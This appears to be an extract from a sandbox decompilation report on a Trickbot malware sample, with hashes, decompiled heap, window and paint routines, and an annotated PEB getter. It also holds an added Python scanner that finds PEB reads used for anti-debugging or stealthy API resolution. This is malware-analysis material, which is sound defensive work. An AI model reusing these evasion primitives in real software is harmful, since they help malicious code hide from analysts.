                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AsyncMessageSendState
                          • String ID:
                          • API String ID: 929296675-0
                          • Opcode ID: 44dd49ad71f75a96d58f715f8125e076d3032ba81f10070f9eac059bbeff7439
                          • Instruction ID: 96bedf7c5fa55a779db449b2874e7636fec8fc24457eb60f5af0196471df2360
                          • Opcode Fuzzy Hash: 44dd49ad71f75a96d58f715f8125e076d3032ba81f10070f9eac059bbeff7439
                          • Instruction Fuzzy Hash: FEF09E31304221B6DE300A35BD48BEB2758DF00340F5544ABF904D1291DBE8ECC2EADD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E0042ED76(void* __ecx, intOrPtr _a4) {
                          				void* _t4;
                          				void* _t13;
                          				intOrPtr _t14;
                          
                          				_t14 = _a4;
                          				_t13 = __ecx;
                          				if(_t14 == 0xffffffff) {
                          					if(IsWindowVisible( *(__ecx + 0x1c)) != 0) {
                          						if(IsIconic( *(_t13 + 0x1c)) != 0) {
                          							_push(9);
                          							goto L5;
                          						}
                          					} else {
                          						_push(1);
                          						L5:
                          						_pop(_t14);
                          					}
                          				}
                          				_t4 = E0042EDC6(_t13, _t14);
                          				if(_t14 != 0xffffffff) {
                          					E0041B7D3(_t13, _t14);
                          					return E0042EDC6(_t13, _t14);
                          				}
                          				return _t4;
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: IconicVisibleWindow
                          • String ID:
                          • API String ID: 1797901696-0
                          • Opcode ID: 15feef5438a24e68bf2c3d7647092dee162e517e2fd7af79898d3694befd7fce
                          • Instruction ID: 30ef9bd84cb1d98728b7d72c2cb64cabec22e2df57df4cd4028a959cb483a23f
                          • Opcode Fuzzy Hash: 15feef5438a24e68bf2c3d7647092dee162e517e2fd7af79898d3694befd7fce
                          • Instruction Fuzzy Hash: FDF0EC3132113226CE212A2FFC406BF255A5FC1774B54522BF521923D0CB585C83529A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00425C28(intOrPtr* __ecx) {
                          				int _t4;
                          				intOrPtr* _t9;
                          
                          				_t9 = __ecx;
                          				_t4 = IsIconic( *(__ecx + 0x1c));
                          				if(_t4 == 0) {
                          					_t4 = IsWindowVisible( *(_t9 + 0x1c));
                          					if(_t4 != 0) {
                          						return  *((intOrPtr*)( *_t9 + 0xbc))();
                          					}
                          				}
                          				return _t4;
                          			}

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: IconicVisibleWindow
                          • String ID:
                          • API String ID: 1797901696-0
                          • Opcode ID: 197ae62a49a6a2c0b509c2ce516134089cb71c82eba9449eafff5446f3f68cee
                          • Instruction ID: bdcd10452f94024076020d3b11954761afefc7d6f9495eb3bab1ee725d4aa70c
                          • Opcode Fuzzy Hash: 197ae62a49a6a2c0b509c2ce516134089cb71c82eba9449eafff5446f3f68cee
                          • Instruction Fuzzy Hash: 62D05E303007208FDB251F26FC08A5676A5AF14601300807DE043C2364EB749C028A44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32 ref: 00409A1D
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: a3befa1aca8b9be3bf6230e9e0998f1579662b286a226ea3c243bff66a41c820
                          • Instruction ID: 29fb6ca460f1e598a3c7da5758b6d036266992367b56be17457cc60ff7533e14
                          • Opcode Fuzzy Hash: a3befa1aca8b9be3bf6230e9e0998f1579662b286a226ea3c243bff66a41c820
                          • Instruction Fuzzy Hash:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004089E4(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
                          				signed int _v8;
                          				signed char _v12;
                          				intOrPtr _v16;
                          				intOrPtr _t186;
                          				void* _t187;
                          				signed int _t188;
                          				signed int* _t189;
                          				intOrPtr _t191;
                          				signed int* _t192;
                          				signed int* _t193;
                          				signed char _t194;
                          				intOrPtr _t195;
                          				intOrPtr* _t196;
                          				signed int _t199;
                          				signed int _t202;
                          				signed int _t207;
                          				signed int _t209;
                          				signed int _t218;
                          				signed int _t221;
                          				signed int* _t222;
                          				signed int _t227;
                          				intOrPtr _t228;
                          				intOrPtr _t229;
                          				intOrPtr _t230;
                          				char _t233;
                          				signed int _t234;
                          				signed char _t235;
                          				signed int* _t237;
                          				signed int* _t239;
                          				signed int* _t244;
                          				signed int* _t245;
                          				signed char _t250;
                          				intOrPtr _t256;
                          				signed int _t257;
                          				char _t258;
                          				char _t259;
                          				signed char _t260;
                          				signed int* _t262;
                          				signed int* _t267;
                          				signed int* _t268;
                          				char* _t270;
                          				signed int _t274;
                          				unsigned int _t275;
                          				intOrPtr _t277;
                          				unsigned int _t278;
                          				intOrPtr* _t280;
                          				void* _t281;
                          				signed char _t290;
                          				signed int _t292;
                          				signed char _t295;
                          				signed int _t298;
                          				signed int _t302;
                          				signed int* _t304;
                          
                          				_t222 = _a4;
                          				_t280 = _a8;
                          				_t186 =  *((intOrPtr*)(_t222 + 0x10));
                          				_t292 = _a12 + 0x00000017 & 0xfffffff0;
                          				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
                          				_v16 = _t274 * 0x204 + _t186 + 0x144;
                          				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
                          				_a12 = _t227;
                          				_t194 =  *(_t227 + _t280 - 4);
                          				_t281 = _t227 + _t280 - 4;
                          				_v8 = _t194;
                          				if(_t292 <= _t227) {
                          					if(__eflags < 0) {
                          						_t195 = _a8;
                          						_a12 = _a12 - _t292;
                          						_t228 = _t292 + 1;
                          						 *((intOrPtr*)(_t195 - 4)) = _t228;
                          						_t196 = _t195 + _t292 - 4;
                          						_a8 = _t196;
                          						_t295 = (_a12 >> 4) - 1;
                          						 *((intOrPtr*)(_t196 - 4)) = _t228;
                          						__eflags = _t295 - 0x3f;
                          						if(_t295 > 0x3f) {
                          							_t295 = 0x3f;
                          						}
                          						__eflags = _v8 & 0x00000001;
                          						if((_v8 & 0x00000001) == 0) {
                          							_t298 = (_v8 >> 4) - 1;
                          							__eflags = _t298 - 0x3f;
                          							if(_t298 > 0x3f) {
                          								_t298 = 0x3f;
                          							}
                          							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
                          							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                          								__eflags = _t298 - 0x20;
                          								if(_t298 >= 0x20) {
                          									_t128 = _t298 - 0x20; // -32
                          									_t130 = _t186 + 4; // 0x4
                          									_t244 = _t298 + _t130;
                          									_t199 =  !(0x80000000 >> _t128);
                          									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                          									 *_t244 =  *_t244 - 1;
                          									__eflags =  *_t244;
                          									if( *_t244 == 0) {
                          										_t245 = _a4;
                          										_t138 = _t245 + 4;
                          										 *_t138 =  *(_t245 + 4) & _t199;
                          										__eflags =  *_t138;
                          									}
                          								} else {
                          									_t304 = _t298 + _t186 + 4;
                          									_t202 =  !(0x80000000 >> _t298);
                          									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                          									 *_t304 =  *_t304 - 1;
                          									__eflags =  *_t304;
                          									if( *_t304 == 0) {
                          										 *_a4 =  *_a4 & _t202;
                          									}
                          								}
                          								_t196 = _a8;
                          							}
                          							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                          							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                          							_t302 = _a12 + _v8;
                          							_a12 = _t302;
                          							_t295 = (_t302 >> 4) - 1;
                          							__eflags = _t295 - 0x3f;
                          							if(_t295 > 0x3f) {
                          								_t295 = 0x3f;
                          							}
                          						}
                          						_t229 = _v16;
                          						_t230 = _t229 + _t295 * 8;
                          						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
                          						 *((intOrPtr*)(_t196 + 8)) = _t230;
                          						 *((intOrPtr*)(_t230 + 4)) = _t196;
                          						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
                          						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
                          						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
                          							_t233 =  *(_t295 + _t186 + 4);
                          							__eflags = _t295 - 0x20;
                          							_a11 = _t233;
                          							_t234 = _t233 + 1;
                          							__eflags = _t234;
                          							 *(_t295 + _t186 + 4) = _t234;
                          							if(_t234 >= 0) {
                          								__eflags = _a11;
                          								if(_a11 == 0) {
                          									_t237 = _a4;
                          									_t176 = _t237 + 4;
                          									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
                          									__eflags =  *_t176;
                          								}
                          								_t189 = _t186 + 0xc4 + _t274 * 4;
                          								_t235 = _t295 - 0x20;
                          								_t275 = 0x80000000;
                          							} else {
                          								__eflags = _a11;
                          								if(_a11 == 0) {
                          									_t239 = _a4;
                          									 *_t239 =  *_t239 | 0x80000000 >> _t295;
                          									__eflags =  *_t239;
                          								}
                          								_t189 = _t186 + 0x44 + _t274 * 4;
                          								_t275 = 0x80000000;
                          								_t235 = _t295;
                          							}
                          							 *_t189 =  *_t189 | _t275 >> _t235;
                          							__eflags =  *_t189;
                          						}
                          						_t188 = _a12;
                          						 *_t196 = _t188;
                          						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
                          					}
                          					L52:
                          					_t187 = 1;
                          					return _t187;
                          				}
                          				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
                          					return 0;
                          				} else {
                          					_t250 = (_v8 >> 4) - 1;
                          					_v12 = _t250;
                          					if(_t250 > 0x3f) {
                          						_t250 = 0x3f;
                          						_v12 = _t250;
                          					}
                          					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
                          						if(_t250 >= 0x20) {
                          							_t267 = _v12 + _t186 + 4;
                          							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
                          							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
                          							 *_t267 =  *_t267 - 1;
                          							__eflags =  *_t267;
                          							if( *_t267 == 0) {
                          								_t268 = _a4;
                          								_t44 = _t268 + 4;
                          								 *_t44 =  *(_t268 + 4) & _t218;
                          								__eflags =  *_t44;
                          							}
                          						} else {
                          							_t270 = _v12 + _t186 + 4;
                          							_t221 =  !(0x80000000 >> _t250);
                          							 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
                          							 *_t270 =  *_t270 - 1;
                          							if( *_t270 == 0) {
                          								 *_a4 =  *_a4 & _t221;
                          							}
                          						}
                          					}
                          					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
                          					 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
                          					_v8 = _v8 + _a12 - _t292;
                          					if(_v8 <= 0) {
                          						_t277 = _a8;
                          					} else {
                          						_t290 = (_v8 >> 4) - 1;
                          						_t256 = _a8 + _t292 - 4;
                          						if(_t290 > 0x3f) {
                          							_t290 = 0x3f;
                          						}
                          						_t207 = _v16 + _t290 * 8;
                          						_a12 = _t207;
                          						 *((intOrPtr*)(_t256 + 4)) =  *((intOrPtr*)(_t207 + 4));
                          						_t209 = _a12;
                          						 *(_t256 + 8) = _t209;
                          						 *((intOrPtr*)(_t209 + 4)) = _t256;
                          						 *((intOrPtr*)( *((intOrPtr*)(_t256 + 4)) + 8)) = _t256;
                          						if( *((intOrPtr*)(_t256 + 4)) ==  *(_t256 + 8)) {
                          							_t258 =  *((intOrPtr*)(_t290 + _t186 + 4));
                          							_a15 = _t258;
                          							_t259 = _t258 + 1;
                          							 *((char*)(_t290 + _t186 + 4)) = _t259;
                          							if(_t259 >= 0) {
                          								__eflags = _a15;
                          								if(_a15 == 0) {
                          									_t84 = _t290 - 0x20; // -33
                          									_t262 = _a4;
                          									_t86 = _t262 + 4;
                          									 *_t86 =  *(_t262 + 4) | 0x80000000 >> _t84;
                          									__eflags =  *_t86;
                          								}
                          								_t193 = _t186 + 0xc4 + _t274 * 4;
                          								_t91 = _t290 - 0x20; // -33
                          								_t260 = _t91;
                          								_t278 = 0x80000000;
                          							} else {
                          								if(_a15 == 0) {
                          									 *_a4 =  *_a4 | 0x80000000 >> _t290;
                          								}
                          								_t193 = _t186 + 0x44 + _t274 * 4;
                          								_t278 = 0x80000000;
                          								_t260 = _t290;
                          							}
                          							 *_t193 =  *_t193 | _t278 >> _t260;
                          						}
                          						_t277 = _a8;
                          						_t257 = _v8;
                          						_t192 = _t277 + _t292 - 4;
                          						 *_t192 = _t257;
                          						 *(_t257 + _t192 - 4) = _t257;
                          					}
                          					_t191 = _t292 + 1;
                          					 *((intOrPtr*)(_t277 - 4)) = _t191;
                          					 *((intOrPtr*)(_t277 + _t292 - 8)) = _t191;
                          					goto L52;
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                          • Instruction ID: 4786073986c82a0dad9da1472215731919049a7f6ec6ffdd01f582f7f1c4f418
                          • Opcode Fuzzy Hash: fc60ecf50bd115ca0c6ea2745a91e2bccda0b72c85d336beea95e2ba67d1c3a9
                          • Instruction Fuzzy Hash: E4B18F7190520ADFDB15CF04C6D0AA9BBB1BF58318F14C1AED85A5B782CB35FA42CB94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			/* Returns the PEB pointer: on 32-bit Windows fs:[0x30] is
                          			   TEB->ProcessEnvironmentBlock. A bare PEB getter like this is the
                          			   usual first step of a PEB->BeingDebugged check or of resolving
                          			   APIs by walking PEB->Ldr instead of the import table; which of the
                          			   two the caller does is not shown in this listing. */
                          			E00402D50(void* __ecx) {
                          				intOrPtr _v8;
                          
                          				_v8 =  *[fs:0x30];   /* mov eax, fs:[30h] -> PEB */
                          				return _v8;
                          			}




                          Instruction addresses 0x00402d5a, 0x00402d63 (disassembly text not captured in this extract)

                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                          • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                          • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                          • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595
                          Uniqueness

                          Uniqueness Score: -1.00%
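As an added example (not part of the Joe Sandbox report and not the sample's own code): the only thing E00402D50 does is read fs:[0x30], so when triaging a sample a practitioner wants to find every such read in the image and see what the code does with the PEB pointer next. The scanner below matches the standard 32-bit encodings of `mov r32, fs:[0x30]` (the report lists the function's addresses but not its bytes, so the exact encoding this sample uses is assumed to be one of these) and then labels each read by its immediate follow-up instruction: a dword load from `[reg+0x0C]` is PEB->Ldr (module-list walk, import-free API resolution), a byte load from `[reg+2]` is PEB->BeingDebugged. The input bytes are constructed for the example.

```python
"""Scan raw x86 code for `mov r32, fs:[0x30]` (PEB pointer reads) and classify
what the code does with the pointer next.

Added example for this report; not Joe Sandbox or Trickbot code. SAMPLE is a
constructed byte string, not bytes taken from the analysed file."""
import re

REG = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# fs:[0x30] is TEB->ProcessEnvironmentBlock on 32-bit Windows.
# `mov eax, fs:[0x30]` has the short A1 (moffs32) form; other registers use
# 8B /r with a disp32-only ModRM (mod=00, rm=101): 05 0D 15 1D 25 2D 35 3D.
_PEB_READ = re.compile(
    rb"\x64(?:\xA1\x30\x00\x00\x00"
    rb"|\x8B[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]\x30\x00\x00\x00)"
)


def _dest_reg(match):
    """Destination register index (0..7) of a matched PEB read."""
    raw = match.group(0)
    if raw[1] == 0xA1:          # A1 form always targets eax
        return 0
    return (raw[2] >> 3) & 7    # ModRM.reg of the 8B /r form


def _classify(data, end, reg):
    """Label the read by the instruction that immediately follows it."""
    nxt = data[end:end + 4]
    # esp as base needs a SIB byte, so the simple ModRM checks below do not apply.
    if reg == 4:
        return "peb-read"
    # mov r32, [reg+0x0C]  (8B /r, mod=01 disp8)  -> PEB->Ldr
    if (len(nxt) >= 3 and nxt[0] == 0x8B and (nxt[1] >> 6) == 1
            and (nxt[1] & 7) == reg and nxt[2] == 0x0C):
        return "ldr-walk"
    # movzx r32, byte [reg+2]  (0F B6 /r)  -> PEB->BeingDebugged
    if (len(nxt) >= 4 and nxt[0] == 0x0F and nxt[1] == 0xB6
            and (nxt[2] >> 6) == 1 and (nxt[2] & 7) == reg and nxt[3] == 0x02):
        return "beingdebugged"
    # mov r8, [reg+2]  (8A /r)  -> PEB->BeingDebugged
    if (len(nxt) >= 3 and nxt[0] == 0x8A and (nxt[1] >> 6) == 1
            and (nxt[1] & 7) == reg and nxt[2] == 0x02):
        return "beingdebugged"
    return "peb-read"


def find_peb_reads(data, base=0):
    """Return [(address, dest_register, label), ...] for every fs:[0x30] read.

    `base` is the virtual address of data[0] so hits can be reported as
    image addresses (the report's listing is based at 0x00400000)."""
    hits = []
    for m in _PEB_READ.finditer(data):
        reg = _dest_reg(m)
        hits.append((base + m.start(), REG[reg], _classify(data, m.end(), reg)))
    return hits


# Constructed sample: three PEB reads with different follow-ups.
SAMPLE = (
    b"\x55\x8B\xEC"                                        # push ebp; mov ebp, esp
    + b"\x64\xA1\x30\x00\x00\x00" + b"\x8B\x40\x0C"        # mov eax, fs:[30h]; mov eax, [eax+0Ch]
    + b"\x90\x90"                                          # nop; nop
    + b"\x64\x8B\x0D\x30\x00\x00\x00" + b"\x0F\xB6\x41\x02"  # mov ecx, fs:[30h]; movzx eax, byte [ecx+2]
    + b"\x64\x8B\x1D\x30\x00\x00\x00" + b"\xC3"            # mov ebx, fs:[30h]; ret
)

if __name__ == "__main__":
    for addr, reg, label in find_peb_reads(SAMPLE, base=0x401000):
        print(f"{addr:#010x}  mov {reg}, fs:[30h]  ->  {label}")
```

Run over a section dumped from the sample (for example the 0x00401000 region the report's memory dumps cover), a hit labelled `ldr-walk` is where to start looking for hash-based API resolution, and a `beingdebugged` hit is a candidate anti-analysis check to patch out or bypass in the debugger.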

                          C-Code - Quality: 84%
                          			/* Owner-draw paint routine for a button-style control (decompiled GUI
                          			   code). Win32 constants as they appear below: 0xfffffff0 = GWL_STYLE
                          			   (low 5 bits, _t200, select the BS_* button type); 0x31 = WM_GETFONT;
                          			   0x135 = WM_CTLCOLORBTN; 0xf2 = BM_GETSTATE; 0xf = COLOR_BTNFACE;
                          			   0x12 = COLOR_BTNTEXT; 0xf00021 = PATCOPY; DrawTextA 0x24 =
                          			   DT_SINGLELINE|DT_VCENTER and 0x20 = DT_SINGLELINE; 0xcc0020 = SRCCOPY,
                          			   pushed with the compatible DC in case 1, consistent with a BitBlt of a
                          			   14x13 bitmap whose handle is read from the global at 0x44d390. */
                          			E00412750(struct HWND__* _a4, struct HDC__* _a8) {
                          				signed int _v40;
                          				struct tagRECT _v296;
                          				char _v308;
                          				struct tagRECT _v324;
                          				struct tagRECT _v340;
                          				struct tagRECT _v356;
                          				long _v360;
                          				void* _v364;
                          				int _v368;
                          				int _v372;
                          				long _v376;
                          				int _v380;
                          				int _v384;
                          				signed int _v388;
                          				long _v396;
                          				void* _v400;
                          				signed int _t155;
                          				struct HWND__* _t157;
                          				void* _t163;
                          				signed int _t175;
                          				signed int _t176;
                          				void* _t185;
                          				signed int _t200;
                          				intOrPtr* _t201;
                          				signed int _t204;
                          				signed int _t205;
                          				intOrPtr* _t211;
                          				struct HWND__* _t218;
                          				struct HDC__* _t219;
                          				signed int _t225;
                          
                          				_t218 = _a4;
                          				_t155 = GetWindowLongA(_t218, 0xfffffff0);
                          				_t200 = _t155 & 0x0000001f;
                          				_v324.left = _t155 & 0x00000020;
                          				_t157 = GetParent(_t218);
                          				_t219 = _a8;
                          				_v340.bottom = _t157;
                          				SetBkMode(_t219, 2);
                          				GetClientRect(_t218,  &_v296);
                          				_t211 =  &_v296;
                          				_t201 =  &(_v324.bottom);
                          				 *_t201 =  *_t211;
                          				 *((intOrPtr*)(_t201 + 4)) = _v296.top;
                          				 *((intOrPtr*)(_t201 + 8)) =  *((intOrPtr*)(_t211 + 8));
                          				 *((intOrPtr*)(_t201 + 0xc)) =  *((intOrPtr*)(_t211 + 0xc));
                          				_t163 = SendMessageA(_t218, 0x31, 0, 0);
                          				_v356.right = _t163;
                          				if(_t163 != 0) {
                          					_v356.left = SelectObject(_t219, _t163);
                          				}
                          				SetBkColor(_t219, GetSysColor(0xf));
                          				SetTextColor(_t219, GetSysColor(0x12));
                          				_v356.bottom = SelectObject(_t219, SendMessageA(_v356.top, 0x135, _t219, _t218));
                          				IntersectClipRect(_t219, _v340.top, _v340.right, _v340.bottom, _v324.left);
                          				_t225 = _v40;
                          				if((_t225 & 0x00000010) != 0 && _t200 != 7) {
                          					PatBlt(_t219, _v356.left, _v356.top, _v356.right - _v356.left, _v356.bottom - _v356.top, 0xf00021);
                          				}
                          				_v368 = IsWindowEnabled(_t218);
                          				_t175 = SendMessageA(_t218, 0xf2, 0, 0);
                          				_v384 = 0;
                          				_t204 = _t175 & 0x00000003;
                          				_v360 = _t204;
                          				asm("sbb ecx, ecx");
                          				_t176 = _t175 & 0x00000004;
                          				_t205 = _t204 + 1;
                          				_v324.left = _t176;
                          				_v388 = ((_t176 >> 0x00000001 | _t205) << 3) - (_t176 >> 0x00000001 | _t205) + ((_t176 >> 0x00000001 | _t205) << 3) - (_t176 >> 0x00000001 | _t205);
                          				if(_v368 == 0) {
                          					_v388 = _v388 + ((_t205 + 2 << 3) - _t205 + 2) * 2;
                          				}
                          				if((_t225 & 0x0000000a) != 0 || _t200 == 0 || _t200 == 1) {
                          					_v372 = GetWindowTextA(_t218,  &_v308, 0x100);
                          				}
                          				if(_t200 > 9) {
                          					L45:
                          					_t185 = SelectObject(_t219, _v364);
                          					if(_v400 != 0) {
                          						return SelectObject(_t219, _v400);
                          					}
                          					return _t185;
                          				} else {
                          					switch( *((intOrPtr*)(_t200 * 4 +  &M00412C74))) {
                          						case 0:
                          							_push(_v324.left);
                          							_push(_t200);
                          							_push(_v372);
                          							_push( &_v308);
                          							_push( &_v340);
                          							_push(_t219);
                          							_push(_t218);
                          							E00412410(_t238);
                          							goto L45;
                          						case 1:
                          							L15:
                          							__eflags = __ebp & 0x00000004;
                          							if((__ebp & 0x00000004) != 0) {
                          								__edi = CreateCompatibleDC(__esi);
                          								__eflags = __edi;
                          								if(__edi != 0) {
                          									__eax =  *0x44d390; // 0x0
                          									__ebx = __eax;
                          									__eflags = __ebx;
                          									if(__ebx != 0) {
                          										__eax = _v396;
                          										_push(0xcc0020);
                          										__ecx = _v400;
                          										_push(_v396);
                          										__eax = _v356.left;
                          										_push(_v400);
                          										__eflags = _v388;
                          										_push(__edi);
                          										_push(0xd);
                          										_push(0xe);
                          										if(_v388 == 0) {
                          											__eax = __eax - _v364;
                          											__ecx = _v364;
                          											__eax = __eax - 0xd;
                          											asm("cdq");
                          											__eax = __eax - __edx;
                          											__ecx = _v364 + __eax;
                          											__eflags = __ecx;
                          											__eax = _v368;
                          											_push(__ecx);
                          										} else {
                          											__eax = __eax - _v364;
                          											__ecx = _v364;
                          											__eax = __eax - 0xd;
                          											asm("cdq");
                          											__eax = __eax - __edx;
                          											__ecx = _v364 + __eax;
                          											__eax = _v360;
                          											_push(__ecx);
                          											__eax = _v360 - 0xe;
                          										}
                          										__eax = SelectObject(__edi, __ebx);
                          									}
                          									__eax = DeleteDC(__edi);
                          								}
                          							}
                          							__eflags = __ebp & 0x00000002;
                          							if((__ebp & 0x00000002) != 0) {
                          								__eflags = _v376;
                          								if(_v376 == 0) {
                          									__eax = _v340.left;
                          									__eax = _v340.left + 0x12;
                          									__eflags = __eax;
                          									_v356.left = __eax;
                          								} else {
                          									_v340.right = _v340.right - 0x12;
                          									_v356.right = _v340.right - 0x12;
                          								}
                          								__eflags = _v368;
                          								if(_v368 == 0) {
                          									__eax =  *0x44d37c; // 0x0
                          									__eax = SetTextColor(__esi, __eax);
                          								}
                          								__eax =  &_v356;
                          								__ecx = _v372;
                          								__edx =  &_v308;
                          								__eax = DrawTextA(__esi,  &_v308, _v372,  &_v356, 0x24);
                          							}
                          							__eflags = __ebp & 0x00000008;
                          							if((__ebp & 0x00000008) != 0) {
                          								__eax =  &_v360;
                          								__ecx =  &_v324;
                          								__edx =  &_v308;
                          								_push( &_v360);
                          								_push( &_v324);
                          								E00410B10(__esi,  &_v308) = _v356.bottom;
                          								_v356.bottom - _v356.top = _v356.bottom - _v356.top - _v360;
                          								asm("cdq");
                          								_v356.bottom - _v356.top - _v360 - __edx = _v356.bottom - _v356.top - _v360 - __edx >> 1;
                          								_v356.top = _v356.bottom - _v356.top - _v360 - __edx >> 1;
                          								_v360 = _v360 + _v356.top;
                          								__eflags = _v376;
                          								_v356.bottom = _v360 + _v356.top;
                          								__eax = _v340.left;
                          								if(_v376 == 0) {
                          									__eax = __eax + 0x12;
                          									__eflags = __eax;
                          									_v356.left = __eax;
                          								} else {
                          									_v340.right = _v340.right - 0x12;
                          									_v356.left = __eax;
                          								}
                          								__eax = _v324.left;
                          								__eax = _v324.left + _v356.left;
                          								__eflags = __eax;
                          								__ecx =  &_v356;
                          								_v356.right = __eax;
                          								__eax = InflateRect( &_v356, 1, 1);
                          								__ecx =  &_v340;
                          								__eax = IntersectRect( &_v356,  &_v356,  &_v340);
                          								__ecx =  &_v356;
                          								__eax = DrawFocusRect(__esi,  &_v356);
                          							}
                          							goto L45;
                          						case 2:
                          							_v384 = 0xd;
                          							goto L15;
                          						case 3:
                          							__eflags = _v360 - 2;
                          							if(_v360 == 2) {
                          								_v384 = 0x1a;
                          							}
                          							goto L15;
                          						case 4:
                          							__eflags = __ebp & 0x00000006;
                          							if((__ebp & 0x00000006) == 0) {
                          								goto L45;
                          							} else {
                          								__eax =  &_v376;
                          								__ecx =  &_v360;
